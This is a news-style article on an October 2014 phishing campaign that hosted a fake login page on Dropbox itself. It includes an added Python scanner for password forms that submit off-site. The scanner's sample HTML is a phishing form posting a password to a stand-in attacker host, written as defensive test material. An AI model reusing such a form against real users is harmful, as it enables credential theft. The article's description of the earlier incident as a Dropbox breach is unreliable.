
Dropbox Used For Elaborate Phishing Attack

Friday, November 21st, 2014

The cloud storage service provider Dropbox was reportedly used for an advanced phishing attack in October. The attack affected hundreds of thousands of users and was the second major attack to target the service in quick succession. While the earlier attack was the result of a major security breach that cost seven million Dropbox users their login credentials, the latest one spread through spam emails and lured users into entering their login details on a fake login page. The attack was detected by the security firm Symantec, which passed its findings to Dropbox for further action.

The modus operandi of the latest attack was far more sophisticated than that of a typical phishing attack. The email informed Dropbox users that they had received an important file that was too large to send by email, or that could not be emailed for security reasons. It then encouraged users to view the file on Dropbox by visiting the link provided alongside. The attackers even marked the email as important to pressure users into clicking the link. When users clicked it, they were redirected to a fake Dropbox login page set up solely to steal their credentials.

Unlike the spoof pages used in other phishing attacks, the fake login page used in this attack was hosted on Dropbox itself. This tricked users into believing that they had indeed received an important file and encouraged them to supply their login credentials. After users entered their Dropbox login and password, they were redirected to the real Dropbox website while their credentials were sent to a web server controlled by the attackers.

By hosting the spoof page on Dropbox, the attackers achieved several goals. First, they convinced even tech-savvy users, who can usually spot fake login pages hosted on unrelated domains, to supply their credentials. Second, the attack fooled people who normally do not click links in emails, since typing the link manually also led to a page hosted on Dropbox. Finally, the page benefited from the SSL security provided by Dropbox. Users visiting the spoof page with the latest version of a popular browser would have seen a security warning (because parts of the page did not use SSL), but older browsers would not have shown any warning at all.
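The tell-tale sign described above, a login form served from a trusted HTTPS host that submits the password somewhere else, can be checked for mechanically. The following scanner is an added example, not code from the article or from Dropbox or Symantec; the page URL, host names and HTML below are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormCollector(HTMLParser):
    """Collect each <form> with its resolved action and whether it holds a password field."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []  # each entry: {"action": absolute URL, "has_password": bool}
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # An empty or missing action means the form posts back to the page itself.
            self._current = {"action": urljoin(self.page_url, a.get("action") or ""),
                             "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def suspicious_credential_forms(page_url, html):
    """Return actions of password forms that leave the page's origin or drop TLS."""
    parser = _FormCollector(page_url)
    parser.feed(html)
    page = urlsplit(page_url)
    flagged = []
    for form in parser.forms:
        if not form["has_password"]:
            continue
        target = urlsplit(form["action"])
        off_origin = (target.scheme, target.netloc) != (page.scheme, page.netloc)
        insecure = page.scheme == "https" and target.scheme != "https"
        if off_origin or insecure:
            flagged.append(form["action"])
    return flagged


# Constructed sample: a spoof page on an HTTPS host posting the password to an attacker-run HTTP host.
SAMPLE_PAGE_URL = "https://files.example.com/s/abc123/login.html"
SAMPLE_HTML = ('<form action="http://collector.example.net/post.php" method="post">'
               '<input type="text" name="email"><input type="password" name="pass"></form>'
               '<form action="/search"><input type="text" name="q"></form>')
```

Run over a saved copy of a suspicious page, a non-empty result means the password leaves the host that served the page, which is exactly what a mixed-content warning in a modern browser is pointing at.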

Symantec said that the spoof page was also used to capture Gmail, AOL, Windows Live and Yahoo account details through an option marked “Other emails”. When users clicked these links, they were redirected to landing sites that mimicked the login pages of services such as Facebook, Google Docs and Microsoft OneDrive. Dropbox shut down the spoof page as soon as it became aware of it, but not before the login credentials of thousands of users had been compromised. The attack once again highlights that criminals are becoming more sophisticated and are using novel methods to steal our personal data. It also shows that we need to exercise extreme caution when supplying our credentials, and to avoid clicking suspicious links or visiting untrusted websites.
